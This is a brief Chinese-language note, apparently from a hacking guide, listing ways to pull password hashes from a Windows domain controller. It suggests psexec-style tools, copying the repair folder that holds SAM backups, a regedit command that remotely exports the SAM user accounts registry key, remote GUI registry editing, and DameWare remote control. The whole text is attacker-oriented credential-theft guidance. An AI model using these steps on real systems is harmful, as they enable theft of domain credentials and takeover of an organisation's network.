因為域控制器一般設置嚴格,用類似的遠程執行工具在執行命令時,往往不會成功,會提示類似not write memory的錯誤這時,我們就要用到其它的方法來獲取Hash了。
1.用psexec類似遠程執行工具,直接抓遠程hash 2.copy C:\WINDOWS\repair
3.regedit \\ip /e d:\aa.reg /S "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"
4.用windows系統自帶的,Gui 界面方式,遠程操作注冊表。
5.遠程管理工具
DameWare Mini Remote Control